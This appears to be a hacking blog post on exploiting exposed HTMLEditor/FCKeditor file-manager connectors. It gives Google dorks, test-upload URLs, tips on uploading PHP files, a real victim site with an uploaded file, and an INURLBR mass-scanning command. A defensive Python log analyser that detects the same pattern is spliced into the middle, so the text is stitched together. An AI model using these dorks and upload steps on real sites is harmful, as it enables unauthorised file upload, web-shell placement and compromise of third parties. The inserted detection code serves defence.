Exploiting HTMLEditor
DORK[0]=> inurl:/HTMLEditor/editor/
DORK[1]=> inurl:/HTMLEditor/editor//filemanager/
DORK[2]=> inurl:/HTMLEditor/editor//filemanager//connectors/
DORK[3]=> inurl:HTMLEditor & "Index of"
DORK[4]=> inurl:"connectors/uploadtest.html" & "Index of"
DORK[5]=> inurl:"/editor/filemanager/" ext:html
DORK[6]=> inurl:"/filemanager/" "Resource Type"
http://www.target.com/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://www.target.com/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Change the connector to PHP and it will perform the upload.
Supported file types: TXT and JPG; on some sites you can also upload HTML and PHP.
The uploaded file can be found at:
http://www.target.com/PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
or
http://www.target.com/patch//PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
Ex:
http://thymeoncavill.com.au/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
UPLOAD=>
http://thymeoncavill.com.au/CMS/files/10487462_686112868144329_1233575004575245355_n.jpg
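For site owners, the access pattern described above (a request to the connectors directory followed by a fetch of a script from the upload folder) can be spotted in web server logs. The following is an added example, not part of the original post; it assumes combined log format, the log lines and the connector script name in them are constructed, and the function name `analyse` is hypothetical.

```python
import re

# Constructed sample access-log lines (combined log format), not real traffic.
# The connector script name in the POST line is a constructed placeholder.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2015:10:00:01 +0000] "GET /CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2015:10:00:09 +0000] "POST /CMS/HTMLEditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 200 310
203.0.113.7 - - [10/Mar/2015:10:00:15 +0000] "GET /CMS/files/notes.php HTTP/1.1" 200 42
198.51.100.4 - - [10/Mar/2015:10:01:00 +0000] "GET /CMS/files/menu.jpg HTTP/1.1" 200 88211
198.51.100.9 - - [10/Mar/2015:10:02:00 +0000] "GET /HTMLEditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 210
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Any request below the editor's connectors directory named in the post.
CONNECTOR_RE = re.compile(r'/editor/filemanager/connectors/', re.I)
# Script or HTML content served from the upload folder named in the post.
UPLOADED_RE = re.compile(r'/files/[^/?]+\.(php\d?|phtml|html?)(\?|$)', re.I)

def analyse(log_text):
    """Return (severity, client_ip, detail) tuples in log order."""
    touched_connector = set()   # clients that requested a connector path
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue            # skip lines that are not in the expected format
        ip, method, path, status = m[1], m[2], m[3], int(m[4])
        if CONNECTOR_RE.search(path):
            touched_connector.add(ip)
            if status < 400:    # the connector directory is reachable from outside
                severity = "high" if method == "POST" else "medium"
                findings.append((severity, ip, f"{method} {path} -> {status}"))
        elif UPLOADED_RE.search(path) and status == 200 and ip in touched_connector:
            # Same client now fetches executable/HTML content from the upload folder.
            findings.append(("critical", ip, f"{path} served after connector access"))
    return findings

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

Any "medium" or higher finding means the connectors directory is still publicly reachable; removing the test page and connectors from production, or restricting them to authenticated users, and disabling script execution in the upload folder closes the path.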
Example usage of SCANNER INURLBR
COMMAND=>{./inurlbr.php --dork 'inurl:"/filemanager/" "Resource Type"' -q 1,6 -s fkeditor.txt -t 2 --replace='/filemanager/[INURL]/filemanager/connectors/uploadtest.html?' -a '
}
Result:
DOWNLOAD SCANNER INURLBR
https://github.com/googleinurl/SCANNER-INURLBR
But what can we do by uploading a txt?